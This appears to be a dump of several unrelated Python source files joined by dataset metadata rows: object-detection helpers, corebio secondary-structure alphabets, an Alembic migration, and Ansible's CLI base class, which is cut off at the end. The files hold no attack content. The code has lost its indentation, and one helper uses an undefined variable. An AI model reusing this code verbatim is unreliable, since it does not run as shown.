[float(line[3]), float(line[2]), float(line[1])])
radius = float(line[4]) / 2.0 + 1.0
if not result.get(line[0]):
result[line[0]] = []
result[line[0]].append((worldCoord, radius))
return result
def trans(boxes, H, confs, thr = -1.0):
gw = H['grid_width']
gh = H['grid_height']
cell_pix_size = H['region_size']
rnnl = H['rnn_len']
ncls = H['num_classes']
boxes = np.reshape(boxes, (-1, gh, gw, rnnl, 4))
confs = np.reshape(confs, (-1, gh, gw, rnnl, ncls))
ret = []
for i in range(rnnl):
for y in range(gh):
for x in range(gw):
if np.max(confs[0, y, x, i, 1:]) > thr:
box = boxes[0, y, x, i, :]
abs_cx = int(box[0]) + cell_pix_size/2 + cell_pix_size * x
abs_cy = int(box[1]) + cell_pix_size/2 + cell_pix_size * y
w = box[2]
h = box[3]
ret.append([abs_cx, abs_cy, w, h, np.max(confs[0, y, x, i, 1: ])])
return np.array(ret)
def split(meta_root, samples):
np.random.seed(2012310818)
l = len(samples)
idxes = np.random.permutation(np.arange(l))
train = [dat[i] for i in idxes[0 : int(l * 0.7)]]
vals = [dat[i] for i in idxes[int(l * 0.7) : ]]
with open(meta_root + 'train.json', 'w') as g:
json.dump(train, g)
with open(meta_root + 'vals.json', 'w') as g:
json.dump(vals, g)
def writeCSV(filename, lines):
with open(filename, "wb") as f:
csvwriter = csv.writer(f)
csvwriter.writerows(lines)
def tryFloat(value):
try:
value = float(value)
except:
value = value
return value
def getColumn(lines, columnid, elementType=''):
column = []
for line in lines:
try:
value = line[columnid]
except:
continue
if elementType == 'float':
value = tryFloat(value)
column.append(value)
return column
def mkdir(d):
if not os.path.exists(d):
os.mkdir(d)
| mit | 5,996,328,860,083,202,000 | 25.417647 | 83 | 0.643732 | false | 2.988024 | false | false | false |
go-bears/Final-Project | weblogo-3.4_rd/corebio/secstruc/__init__.py | 1 | 1920 |
""" Protein secondary structure and associated tools and data.
Constants:
- secstruc_alphabet
-- Secondary structure alphabet: 'HGIEBbTSC _-L?X'
Contains a complete set of secondary structure codes generated by both
STRIDE and DSSP
- secstruc_ehl_alphabet
-- Standard 3 state secondary structure alphabet: EHLX
E : Extended strand
H : Helix
L : Loop
X : Unknown
There are two common ways of reducing the full secondary structure alphabet to
the simpler three letter EHL alphabet. The EHL reduction converts 3/10 and pi
helixes to H (helix) and beta-bridges to strands (E), whereas the FA reduction
converts all non-canonical helixes and strands to L (loop). The FA reduction is
more predictable.
- fa_reduce_secstruc_to_ehl
- reduce_secstruc_to_ehl
Usage :
>>> from corebio.secstruc import *
>>> record = dssp.DsspRecord( open('test_corebio/data/1crn.dssp') )
>>> record.secondary()
' EE SSHHHHHHHHHHHTTT HHHHHHHHS EE SSS GGG '
>>> fa_reduce_secstruc_to_ehl(record.secondary())
'LEELLLHHHHHHHHHHHLLLLLHHHHHHHHLLEELLLLLLLLLLLL'
"""
from __future__ import absolute_import
__all__ = ['dssp', 'stride','secstruc_alphabet','secstruc_ehl_alphabet',
'fa_reduce_secstruc_to_ehl', 'ehl_reduce_secstruc_to_ehl']
from ..seq import Alphabet, Seq
from ..transform import Transform
# ------------------- SECONDARY STRUCTURE ALPHABETS -------------------
secstruc_alphabet = Alphabet("HGIEBbTSC _-L?X")
secstruc_ehl_alphabet = Alphabet("EHLX")
fa_reduce_secstruc_to_ehl = \
Transform( Seq("HGIEBbTSC _-L?X", secstruc_alphabet),
Seq("HLLELLLLLLLLLXX", secstruc_ehl_alphabet) )
ehl_reduce_secstruc_to_ehl = \
Transform( Seq("HGIEBbTSC _-L?X", secstruc_alphabet),
Seq("HHHEEELLLLLLLXX", secstruc_ehl_alphabet) )
| mit | -110,092,327,526,944,400 | 32.684211 | 79 | 0.655729 | false | 3.194676 | false | true | false |
hasgeek/funnel | migrations/versions/daeb6753652a_add_profile_protected_and_verified_flags.py | 1 | 1186 | """Add profile protected and verified flags.
Revision ID: daeb6753652a
Revises: 8b46a8a8ca17
Create Date: 2020-11-06 02:57:05.891627
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'daeb6753652a'
down_revision = '8b46a8a8ca17'
branch_labels = None
depends_on = None
def upgrade():
op.add_column(
'profile',
sa.Column(
'is_protected',
sa.Boolean(),
nullable=False,
server_default=sa.sql.expression.false(),
),
)
op.alter_column('profile', 'is_protected', server_default=None)
op.add_column(
'profile',
sa.Column(
'is_verified',
sa.Boolean(),
nullable=False,
server_default=sa.sql.expression.false(),
),
)
op.alter_column('profile', 'is_verified', server_default=None)
op.create_index(
op.f('ix_profile_is_verified'), 'profile', ['is_verified'], unique=False
)
def downgrade():
op.drop_index(op.f('ix_profile_is_verified'), table_name='profile')
op.drop_column('profile', 'is_verified')
op.drop_column('profile', 'is_protected')
| agpl-3.0 | -5,126,532,979,559,593,000 | 23.708333 | 80 | 0.607926 | false | 3.378917 | false | false | false |
xen0l/ansible | lib/ansible/cli/__init__.py | 1 | 40009 | # (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2016, Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import getpass
import operator
import optparse
import os
import subprocess
import re
import sys
import time
import yaml
from abc import ABCMeta, abstractmethod
import ansible
from ansible import constants as C
from ansible.errors import AnsibleOptionsError, AnsibleError
from ansible.inventory.manager import InventoryManager
from ansible.module_utils.six import with_metaclass, string_types
from ansible.module_utils._text import to_bytes, to_text
from ansible.parsing.dataloader import DataLoader
from ansible.release import __version__
from ansible.utils.path import unfrackpath
from ansible.utils.vars import load_extra_vars, load_options_vars
from ansible.vars.manager import VariableManager
from ansible.parsing.vault import PromptVaultSecret, get_file_vault_secret
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class SortedOptParser(optparse.OptionParser):
'''Optparser which sorts the options by opt before outputting --help'''
def format_help(self, formatter=None, epilog=None):
self.option_list.sort(key=operator.methodcaller('get_opt_string'))
return optparse.OptionParser.format_help(self, formatter=None)
# Note: Inherit from SortedOptParser so that we get our format_help method
class InvalidOptsParser(SortedOptParser):
'''Ignore invalid options.
Meant for the special case where we need to take care of help and version
but may not know the full range of options yet. (See it in use in set_action)
'''
def __init__(self, parser):
# Since this is special purposed to just handle help and version, we
# take a pre-existing option parser here and set our options from
# that. This allows us to give accurate help based on the given
# option parser.
SortedOptParser.__init__(self, usage=parser.usage,
option_list=parser.option_list,
option_class=parser.option_class,
conflict_handler=parser.conflict_handler,
description=parser.description,
formatter=parser.formatter,
add_help_option=False,
prog=parser.prog,
epilog=parser.epilog)
self.version = parser.version
def _process_long_opt(self, rargs, values):
try:
optparse.OptionParser._process_long_opt(self, rargs, values)
except optparse.BadOptionError:
pass
def _process_short_opts(self, rargs, values):
try:
optparse.OptionParser._process_short_opts(self, rargs, values)
except optparse.BadOptionError:
pass
class CLI(with_metaclass(ABCMeta, object)):
''' code behind bin/ansible* programs '''
VALID_ACTIONS = []
_ITALIC = re.compile(r"I\(([^)]+)\)")
_BOLD = re.compile(r"B\(([^)]+)\)")
_MODULE = re.compile(r"M\(([^)]+)\)")
_URL = re.compile(r"U\(([^)]+)\)")
_CONST = re.compile(r"C\(([^)]+)\)")
PAGER = 'less'
# -F (quit-if-one-screen) -R (allow raw ansi control chars)
# -S (chop long lines) -X (disable termcap init and de-init)
LESS_OPTS = 'FRSX'
SKIP_INVENTORY_DEFAULTS = False
def __init__(self, args, callback=None):
"""
Base init method for all command line programs
"""
self.args = args
self.options = None
self.parser = None
self.action = None
self.callback = callback
def set_action(self):
"""
Get the action the user wants to execute from the sys argv list.
"""
for i in range(0, len(self.args)):
arg = self.args[i]
if arg in self.VALID_ACTIONS:
self.action = arg
del self.args[i]
break
if not self.action:
# if we're asked for help or version, we don't need an action.
# have to use a special purpose Option Parser to figure that out as
# the standard OptionParser throws an error for unknown options and
# without knowing action, we only know of a subset of the options
# that could be legal for this command
tmp_parser = InvalidOptsParser(self.parser)
tmp_options, tmp_args = tmp_parser.parse_args(self.args)
if not(hasattr(tmp_options, 'help') and tmp_options.help) or (hasattr(tmp_options, 'version') and tmp_options.version):
raise AnsibleOptionsError("Missing required action")
def execute(self):
"""
Actually runs a child defined method using the execute_<action> pattern
"""
fn = getattr(self, "execute_%s" % self.action)
fn()
@abstractmethod
def run(self):
"""Run the ansible command
Subclasses must implement this method. It does the actual work of
running an Ansible command.
"""
display.vv(to_text(self.parser.get_version()))
if C.CONFIG_FILE:
display.v(u"Using %s as config file" % to_text(C.CONFIG_FILE))
else:
display.v(u"No config file found; using defaults")
# warn about deprecated config options
for deprecated in C.config.DEPRECATED:
name = deprecated[0]
why = deprecated[1]['why']
if 'alternatives' in deprecated[1]:
alt = ', use %s instead' % deprecated[1]['alternatives']
else:
alt = ''
ver = deprecated[1]['version']
display.deprecated("%s option, %s %s" % (name, why, alt), version=ver)
@staticmethod
def split_vault_id(vault_id):
# return (before_@, after_@)
# if no @, return whole string as after_
if '@' not in vault_id:
return (None, vault_id)
parts = vault_id.split('@', 1)
ret = tuple(parts)
return ret
@staticmethod
def build_vault_ids(vault_ids, vault_password_files=None,
ask_vault_pass=None, create_new_password=None,
auto_prompt=True):
vault_password_files = vault_password_files or []
vault_ids = vault_ids or []
# convert vault_password_files into vault_ids slugs
for password_file in vault_password_files:
id_slug = u'%s@%s' % (C.DEFAULT_VAULT_IDENTITY, password_file)
# note this makes --vault-id higher precendence than --vault-password-file
# if we want to intertwingle them in order probably need a cli callback to populate vault_ids
# used by --vault-id and --vault-password-file
vault_ids.append(id_slug)
# if an action needs an encrypt password (create_new_password=True) and we dont
# have other secrets setup, then automatically add a password prompt as well.
# prompts cant/shouldnt work without a tty, so dont add prompt secrets
if ask_vault_pass or (not vault_ids and auto_prompt):
id_slug = u'%s@%s' % (C.DEFAULT_VAULT_IDENTITY, u'prompt_ask_vault_pass')
vault_ids.append(id_slug)
return vault_ids
# TODO: remove the now unused args
@staticmethod
def setup_vault_secrets(loader, vault_ids, vault_password_files=None,
ask_vault_pass=None, create_new_password=False,
auto_prompt=True):
# list of tuples
vault_secrets = []
# Depending on the vault_id value (including how --ask-vault-pass / --vault-password-file create a vault_id)
# we need to show different prompts. This is for compat with older Towers that expect a
# certain vault password prompt format, so 'promp_ask_vault_pass' vault_id gets the old format.
prompt_formats = {}
# If there are configured default vault identities, they are considered 'first'
# so we prepend them to vault_ids (from cli) here
vault_password_files = vault_password_files or []
if C.DEFAULT_VAULT_PASSWORD_FILE:
vault_password_files.append(C.DEFAULT_VAULT_PASSWORD_FILE)
if create_new_password:
prompt_formats['prompt'] = ['New vault password (%(vault_id)s): ',
'Confirm vew vault password (%(vault_id)s): ']
# 2.3 format prompts for --ask-vault-pass
prompt_formats['prompt_ask_vault_pass'] = ['New Vault password: ',
'Confirm New Vault password: ']
else:
prompt_formats['prompt'] = ['Vault password (%(vault_id)s): ']
# The format when we use just --ask-vault-pass needs to match 'Vault password:\s*?$'
prompt_formats['prompt_ask_vault_pass'] = ['Vault password: ']
vault_ids = CLI.build_vault_ids(vault_ids,
vault_password_files,
ask_vault_pass,
create_new_password,
auto_prompt=auto_prompt)
for vault_id_slug in vault_ids:
vault_id_name, vault_id_value = CLI.split_vault_id(vault_id_slug)
if vault_id_value in ['prompt', 'prompt_ask_vault_pass']:
# --vault-id some_name@prompt_ask_vault_pass --vault-id other_name@prompt_ask_vault_pass will be a little
# confusing since it will use the old format without the vault id in the prompt
built_vault_id = vault_id_name or C.DEFAULT_VAULT_IDENTITY
# choose the prompt based on --vault-id=prompt or --ask-vault-pass. --ask-vault-pass
# always gets the old format for Tower compatibility.
# ie, we used --ask-vault-pass, so we need to use the old vault password prompt
# format since Tower needs to match on that format.
prompted_vault_secret = PromptVaultSecret(prompt_formats=prompt_formats[vault_id_value],
vault_id=built_vault_id)
# a empty or invalid password from the prompt will warn and continue to the next
# without erroring globablly
try:
prompted_vault_secret.load()
except AnsibleError as exc:
display.warning('Error in vault password prompt (%s): %s' % (vault_id_name, exc))
raise
vault_secrets.append((built_vault_id, prompted_vault_secret))
# update loader with new secrets incrementally, so we can load a vault password
# that is encrypted with a vault secret provided earlier
loader.set_vault_secrets(vault_secrets)
continue
# assuming anything else is a password file
display.vvvvv('Reading vault password file: %s' % vault_id_value)
# read vault_pass from a file
file_vault_secret = get_file_vault_secret(filename=vault_id_value,
vault_id=vault_id_name,
loader=loader)
# an invalid password file will error globally
try:
file_vault_secret.load()
except AnsibleError as exc:
display.warning('Error in vault password file loading (%s): %s' % (vault_id_name, exc))
raise
if vault_id_name:
vault_secrets.append((vault_id_name, file_vault_secret))
else:
vault_secrets.append((C.DEFAULT_VAULT_IDENTITY, file_vault_secret))
# update loader with as-yet-known vault secrets
loader.set_vault_secrets(vault_secrets)
return vault_secrets
def ask_passwords(self):
''' prompt for connection and become passwords if needed '''
op = self.options
sshpass = None
becomepass = None
become_prompt = ''
become_prompt_method = "BECOME" if C.AGNOSTIC_BECOME_PROMPT else op.become_method.upper()
try:
if op.ask_pass:
sshpass = getpass.getpass(prompt="SSH password: ")
become_prompt = "%s password[defaults to SSH password]: " % become_prompt_method
if sshpass:
sshpass = to_bytes(sshpass, errors='strict', nonstring='simplerepr')
else:
become_prompt = "%s password: " % become_prompt_method
if op.become_ask_pass:
becomepass = getpass.getpass(prompt=become_prompt)
if op.ask_pass and becomepass == '':
becomepass = sshpass
if becomepass:
becomepass = to_bytes(becomepass)
except EOFError:
pass
return (sshpass, becomepass)
def normalize_become_options(self):
''' this keeps backwards compatibility with sudo/su self.options '''
self.options.become_ask_pass = self.options.become_ask_pass or self.options.ask_sudo_pass or self.options.ask_su_pass or C.DEFAULT_BECOME_ASK_PASS
self.options.become_user = self.options.become_user or self.options.sudo_user or self.options.su_user or C.DEFAULT_BECOME_USER
def _dep(which):
display.deprecated('The %s command line option has been deprecated in favor of the "become" command line arguments' % which, '2.6')
if self.options.become:
pass
elif self.options.sudo:
self.options.become = True
self.options.become_method = 'sudo'
_dep('sudo')
elif self.options.su:
self.options.become = True
self.options.become_method = 'su'
_dep('su')
# other deprecations:
if self.options.ask_sudo_pass or self.options.sudo_user:
_dep('sudo')
if self.options.ask_su_pass or self.options.su_user:
_dep('su')
def validate_conflicts(self, vault_opts=False, runas_opts=False, fork_opts=False, vault_rekey_opts=False):
''' check for conflicting options '''
op = self.options
if vault_opts:
# Check for vault related conflicts
if (op.ask_vault_pass and op.vault_password_files):
self.parser.error("--ask-vault-pass and --vault-password-file are mutually exclusive")
if vault_rekey_opts:
if (op.new_vault_id and op.new_vault_password_file):
self.parser.error("--new-vault-password-file and --new-vault-id are mutually exclusive")
if runas_opts:
# Check for privilege escalation conflicts
if ((op.su or op.su_user) and (op.sudo or op.sudo_user) or
(op.su or op.su_user) and (op.become or op.become_user) or
(op.sudo or op.sudo_user) and (op.become or op.become_user)):
self.parser.error("Sudo arguments ('--sudo', '--sudo-user', and '--ask-sudo-pass') and su arguments ('--su', '--su-user', and '--ask-su-pass') "
"and become arguments ('--become', '--become-user', and '--ask-become-pass') are exclusive of each other")
if fork_opts:
if op.forks < 1:
self.parser.error("The number of processes (--forks) must be >= 1")
@staticmethod
def unfrack_paths(option, opt, value, parser):
paths = getattr(parser.values, option.dest)
if paths is None:
paths = []
if isinstance(value, string_types):
paths[:0] = [unfrackpath(x) for x in value.split(os.pathsep) if x]
elif isinstance(value, list):
paths[:0] = [unfrackpath(x) for x in value if x]
else:
pass # FIXME: should we raise options error?
setattr(parser.values, option.dest, paths)
@staticmethod
def unfrack_path(option, opt, value, parser):
if value != '-':
setattr(parser.values, option.dest, unfrackpath(value))
else:
setattr(parser.values, option.dest, value)
@staticmethod
def base_parser(usage="", output_opts=False, runas_opts=False, meta_opts=False, runtask_opts=False, vault_opts=False, module_opts=False,
async_opts=False, connect_opts=False, subset_opts=False, check_opts=False, inventory_opts=False, epilog=None, fork_opts=False,
runas_prompt_opts=False, desc=None, basedir_opts=False, vault_rekey_opts=False):
''' create an options parser for most ansible scripts '''
# base opts
parser = SortedOptParser(usage, version=CLI.version("%prog"), description=desc, epilog=epilog)
parser.add_option('-v', '--verbose', dest='verbosity', default=C.DEFAULT_VERBOSITY, action="count",
help="verbose mode (-vvv for more, -vvvv to enable connection debugging)")
if inventory_opts:
parser.add_option('-i', '--inventory', '--inventory-file', dest='inventory', action="append",
help="specify inventory host path or comma separated host list. --inventory-file is deprecated")
parser.add_option('--list-hosts', dest='listhosts', action='store_true',
help='outputs a list of matching hosts; does not execute anything else')
parser.add_option('-l', '--limit', default=C.DEFAULT_SUBSET, dest='subset',
help='further limit selected hosts to an additional pattern')
if module_opts:
parser.add_option('-M', '--module-path', dest='module_path', default=None,
help="prepend colon-separated path(s) to module library (default=%s)" % C.DEFAULT_MODULE_PATH,
action="callback", callback=CLI.unfrack_paths, type='str')
if runtask_opts:
parser.add_option('-e', '--extra-vars', dest="extra_vars", action="append",
help="set additional variables as key=value or YAML/JSON, if filename prepend with @", default=[])
if fork_opts:
parser.add_option('-f', '--forks', dest='forks', default=C.DEFAULT_FORKS, type='int',
help="specify number of parallel processes to use (default=%s)" % C.DEFAULT_FORKS)
if vault_opts:
parser.add_option('--ask-vault-pass', default=C.DEFAULT_ASK_VAULT_PASS, dest='ask_vault_pass', action='store_true',
help='ask for vault password')
parser.add_option('--vault-password-file', default=[], dest='vault_password_files',
help="vault password file", action="callback", callback=CLI.unfrack_paths, type='string')
parser.add_option('--vault-id', default=[], dest='vault_ids', action='append', type='string',
help='the vault identity to use')
if vault_rekey_opts:
parser.add_option('--new-vault-password-file', default=None, dest='new_vault_password_file',
help="new vault password file for rekey", action="callback", callback=CLI.unfrack_path, type='string')
parser.add_option('--new-vault-id', default=None, dest='new_vault_id', type='string',
help='the new vault identity to use for rekey')
if subset_opts:
parser.add_option('-t', '--tags', dest='tags', default=C.TAGS_RUN, action='append',
help="only run plays and tasks tagged with these values")
parser.add_option('--skip-tags', dest='skip_tags', default=C.TAGS_SKIP, action='append',
help="only run plays and tasks whose tags do not match these values")
if output_opts:
parser.add_option('-o', '--one-line', dest='one_line', action='store_true',
help='condense output')
parser.add_option('-t', '--tree', dest='tree', default=None,
help='log output to this directory')
if connect_opts:
connect_group = optparse.OptionGroup(parser, "Connection Options", "control as whom and how to connect to hosts")
connect_group.add_option('-k', '--ask-pass', default=C.DEFAULT_ASK_PASS, dest='ask_pass', action='store_true',
help='ask for connection password')
connect_group.add_option('--private-key', '--key-file', default=C.DEFAULT_PRIVATE_KEY_FILE, dest='private_key_file',
help='use this file to authenticate the connection', action="callback", callback=CLI.unfrack_path, type='string')
connect_group.add_option('-u', '--user', default=C.DEFAULT_REMOTE_USER, dest='remote_user',
help='connect as this user (default=%s)' % C.DEFAULT_REMOTE_USER)
connect_group.add_option('-c', '--connection', dest='connection', default=C.DEFAULT_TRANSPORT,
help="connection type to use (default=%s)" % C.DEFAULT_TRANSPORT)
connect_group.add_option('-T', '--timeout', default=C.DEFAULT_TIMEOUT, type='int', dest='timeout',
help="override the connection timeout in seconds (default=%s)" % C.DEFAULT_TIMEOUT)
connect_group.add_option('--ssh-common-args', default='', dest='ssh_common_args',
help="specify common arguments to pass to sftp/scp/ssh (e.g. ProxyCommand)")
connect_group.add_option('--sftp-extra-args', default='', dest='sftp_extra_args',
help="specify extra arguments to pass to sftp only (e.g. -f, -l)")
connect_group.add_option('--scp-extra-args', default='', dest='scp_extra_args',
help="specify extra arguments to pass to scp only (e.g. -l)")
connect_group.add_option('--ssh-extra-args', default='', dest='ssh_extra_args',
help="specify extra arguments to pass to ssh only (e.g. -R)")
parser.add_option_group(connect_group)
runas_group = None
rg = optparse.OptionGroup(parser, "Privilege Escalation Options", "control how and which user you become as on target hosts")
if runas_opts:
runas_group = rg
# priv user defaults to root later on to enable detecting when this option was given here
runas_group.add_option("-s", "--sudo", default=C.DEFAULT_SUDO, action="store_true", dest='sudo',
help="run operations with sudo (nopasswd) (deprecated, use become)")
runas_group.add_option('-U', '--sudo-user', dest='sudo_user', default=None,
help='desired sudo user (default=root) (deprecated, use become)')
runas_group.add_option('-S', '--su', default=C.DEFAULT_SU, action='store_true',
help='run operations with su (deprecated, use become)')
runas_group.add_option('-R', '--su-user', default=None,
help='run operations with su as this user (default=%s) (deprecated, use become)' % C.DEFAULT_SU_USER)
# consolidated privilege escalation (become)
runas_group.add_option("-b", "--become", default=C.DEFAULT_BECOME, action="store_true", dest='become',
help="run operations with become (does not imply password prompting)")
runas_group.add_option('--become-method', dest='become_method', default=C.DEFAULT_BECOME_METHOD, type='choice', choices=C.BECOME_METHODS,
help="privilege escalation method to use (default=%s), valid choices: [ %s ]" %
(C.DEFAULT_BECOME_METHOD, ' | '.join(C.BECOME_METHODS)))
runas_group.add_option('--become-user', default=None, dest='become_user', type='string',
help='run operations as this user (default=%s)' % C.DEFAULT_BECOME_USER)
if runas_opts or runas_prompt_opts:
if not runas_group:
runas_group = rg
runas_group.add_option('--ask-sudo-pass', default=C.DEFAULT_ASK_SUDO_PASS, dest='ask_sudo_pass', action='store_true',
help='ask for sudo password (deprecated, use become)')
runas_group.add_option('--ask-su-pass', default=C.DEFAULT_ASK_SU_PASS, dest='ask_su_pass', action='store_true',
help='ask for su password (deprecated, use become)')
runas_group.add_option('-K', '--ask-become-pass', default=False, dest='become_ask_pass', action='store_true',
help='ask for privilege escalation password')
if runas_group:
parser.add_option_group(runas_group)
if async_opts:
parser.add_option('-P', '--poll', default=C.DEFAULT_POLL_INTERVAL, type='int', dest='poll_interval',
help="set the poll interval if using -B (default=%s)" % C.DEFAULT_POLL_INTERVAL)
parser.add_option('-B', '--background', dest='seconds', type='int', default=0,
help='run asynchronously, failing after X seconds (default=N/A)')
if check_opts:
parser.add_option("-C", "--check", default=False, dest='check', action='store_true',
help="don't make any changes; instead, try to predict some of the changes that may occur")
parser.add_option('--syntax-check', dest='syntax', action='store_true',
help="perform a syntax check on the playbook, but do not execute it")
parser.add_option("-D", "--diff", default=C.DIFF_ALWAYS, dest='diff', action='store_true',
help="when changing (small) files and templates, show the differences in those files; works great with --check")
if meta_opts:
parser.add_option('--force-handlers', default=C.DEFAULT_FORCE_HANDLERS, dest='force_handlers', action='store_true',
help="run handlers even if a task fails")
parser.add_option('--flush-cache', dest='flush_cache', action='store_true',
help="clear the fact cache for every host in inventory")
if basedir_opts:
parser.add_option('--playbook-dir', default=None, dest='basedir', action='store',
help="Since this tool does not use playbooks, use this as a subsitute playbook directory."
"This sets the relative path for many features including roles/ group_vars/ etc.")
return parser
@abstractmethod
def parse(self):
"""Parse the command line args
This method parses the command line arguments. It uses the parser
stored in the self.parser attribute and saves the args and options in
self.args and self.options respectively.
Subclasses need to implement this method. They will usually create
a base_parser, add their own options to the base_parser, and then call
this method to do the actual parsing. An implementation will look
something like this::
def parse(self):
parser = super(MyCLI, self).base_parser(usage="My Ansible CLI", inventory_opts=True)
parser.add_option('--my-option', dest='my_option', action='store')
self.parser = parser
super(MyCLI, self).parse()
# If some additional transformations are needed for the
# arguments and options, do it here.
"""
self.options, self.args = self.parser.parse_args(self.args[1:])
# process tags
if hasattr(self.options, 'tags') and not self.options.tags:
# optparse defaults does not do what's expected
self.options.tags = ['all']
if hasattr(self.options, 'tags') and self.options.tags:
if not C.MERGE_MULTIPLE_CLI_TAGS:
if len(self.options.tags) > 1:
display.deprecated('Specifying --tags multiple times on the command line currently uses the last specified value. '
'In 2.4, values will be merged instead. Set merge_multiple_cli_tags=True in ansible.cfg to get this behavior now.',
version=2.5, removed=False)
self.options.tags = [self.options.tags[-1]]
tags = set()
for tag_set in self.options.tags:
for tag in tag_set.split(u','):
tags.add(tag.strip())
self.options.tags = list(tags)
# process skip_tags
if hasattr(self.options, 'skip_tags') and self.options.skip_tags:
if not C.MERGE_MULTIPLE_CLI_TAGS:
if len(self.options.skip_tags) > 1:
display.deprecated('Specifying --skip-tags multiple times on the command line currently uses the last specified value. '
'In 2.4, values will be merged instead. Set merge_multiple_cli_tags=True in ansible.cfg to get this behavior now.',
version=2.5, removed=False)
self.options.skip_tags = [self.options.skip_tags[-1]]
skip_tags = set()
for tag_set in self.options.skip_tags:
for tag in tag_set.split(u','):
skip_tags.add(tag.strip())
self.options.skip_tags = list(skip_tags)
# process inventory options except for CLIs that require their own processing
if hasattr(self.options, 'inventory') and not self.SKIP_INVENTORY_DEFAULTS:
if self.options.inventory:
# should always be list
if isinstance(self.options.inventory, string_types):
self.options.inventory = [self.options.inventory]
# Ensure full paths when needed
self.options.inventory = [unfrackpath(opt, follow=False) if ',' not in opt else opt for opt in self.options.inventory]
else:
self.options.inventory = C.DEFAULT_HOST_LIST
@staticmethod
def version(prog):
''' return ansible version '''
result = "{0} {1}".format(prog, __version__)
gitinfo = CLI._gitinfo()
if gitinfo:
result = result + " {0}".format(gitinfo)
result += "\n config file = %s" % C.CONFIG_FILE
if C.DEFAULT_MODULE_PATH is None:
cpath = "Default w/o overrides"
else:
cpath = C.DEFAULT_MODULE_PATH
result = result + "\n configured module search path = %s" % cpath
result = result + "\n ansible python module location = %s" % ':'.join(ansible.__path__)
result = result + "\n executable location = %s" % sys.argv[0]
result = result + "\n python version = %s" % ''.join(sys.version.splitlines())
return result
@staticmethod
def version_info(gitinfo=False):
''' return full ansible version info '''
if gitinfo:
# expensive call, user with care
ansible_version_string = CLI.version('')
else:
ansible_version_string = __version__
ansible_version = ansible_version_string.split()[0]
ansible_versions = ansible_version.split('.')
for counter in range(len(ansible_versions)):
if ansible_versions[counter] == "":
ansible_versions[counter] = 0
try:
ansible_versions[counter] = int(ansible_versions[counter])
except Exception:
pass
if len(ansible_versions) < 3:
for counter in range(len(ansible_versions), 3):
ansible_versions.append(0)
return {'string': ansible_version_string.strip(),
'full': ansible_version,
'major': ansible_versions[0],
'minor': ansible_versions[1],
'revision': ansible_versions[2]}
@staticmethod
def _git_repo_info(repo_path):
''' returns a string containing git branch, commit id and commit date '''
result = None
if os.path.exists(repo_path):
# Check if the .git is a file. If it is a file, it means that we are in a submodule structure.
if os.path.isfile(repo_path):
try:
gitdir = yaml.safe_load(open(repo_path)).get('gitdir')
# There is a possibility the .git file to have an absolute path.
if os.path.isabs(gitdir):
repo_path = gitdir
else:
repo_path = os.path.join(repo_path[:-4], gitdir)
except (IOError, AttributeError):
return ''
f = open(os.path.join(repo_path, "HEAD"))
line = f.readline().rstrip("\n")
if line.startswith("ref:"):
branch_path = os.path.join(repo_path, line[5:])
else:
branch_path = None
f.close()
if branch_path and os.path.exists(branch_path):
branch = '/'.join(line.split('/')[2:])
f = open(branch_path)
commit = f.readline()[:10]
f.close()
else:
# detached HEAD
commit = line[:10]
branch = 'detached HEAD'
branch_path = os.path.join(repo_path, "HEAD")
date = time.localtime(os.stat(branch_path).st_mtime)
if time.daylight == 0:
offset = time.timezone
else:
offset = time.altzone
result = "({0} {1}) last updated {2} (GMT {3:+04d})".format(branch, commit, time.strftime("%Y/%m/%d %H:%M:%S", date), int(offset / -36))
else:
result = ''
return result
@staticmethod
def _gitinfo():
basedir = os.path.join(os.path.dirname(__file__), '..', '..', '..')
repo_path = os.path.join(basedir, '.git')
result = CLI._git_repo_info(repo_path)
submodules = os.path.join(basedir, '.gitmodules')
if not os.path.exists(submodules):
return result
f = open(submodules)
for line in f:
tokens = line.strip().split(' ')
if tokens[0] == 'path':
submodule_path = tokens[2]
submodule_info = CLI._git_repo_info(os.path.join(basedir, submodule_path, '.git'))
if not submodule_info:
submodule_info = ' not found - use git submodule update --init ' + submodule_path
result += "\n {0}: {1}".format(submodule_path, submodule_info)
f.close()
return result
def pager(self, text):
''' find reasonable way to display text '''
# this is a much simpler form of what is in pydoc.py
if not sys.stdout.isatty():
display.display(text, screen_only=True)
elif 'PAGER' in os.environ:
if sys.platform == 'win32':
display.display(text, screen_only=True)
else:
self.pager_pipe(text, os.environ['PAGER'])
else:
p = subprocess.Popen('less --version', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
if p.returncode == 0:
self.pager_pipe(text, 'less')
else:
display.display(text, screen_only=True)
@staticmethod
def pager_pipe(text, cmd):
''' pipe text through a pager '''
if 'LESS' not in os.environ:
os.environ['LESS'] = CLI.LESS_OPTS
try:
cmd = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=sys.stdout)
cmd.communicate(input=to_bytes(text))
except IOError:
pass
except KeyboardInterrupt:
pass
@classmethod
def tty_ify(cls, text):
t = cls._ITALIC.sub("`" + r"\1" + "'", text) # I(word) => `word'
t = cls._BOLD.sub("*" + r"\1" + "*", t) # B(word) => *word*
t = cls._MODULE.sub("[" + r"\1" + "]", t) # M(word) => [word]
t = cls._URL.sub(r"\1", t) # U(word) => word
t = cls._CONST.sub("`" + r"\1" + "'", t) # C(word) => `word'
return t
@staticmethod
def _play_prereqs(options):
# all needs loader
loader = DataLoader()
basedir = getattr(options, 'basedir', False)
if basedir:
loader.set_basedir(basedir)
vault_ids = options.vault_ids
default_vault_ids = C.DEFAULT_VAULT_IDENTITY_LIST
vault_ids = default_vault_ids + vault_ids
vault_secrets = CLI.setup_vault_secrets(loader,
vault_ids=vault_ids,
vault_password_files=options.vault_password_files,
ask_vault_pass=options.ask_vault_pass,
auto_prompt=False)
loader.set_vault_secrets(vault_secrets)
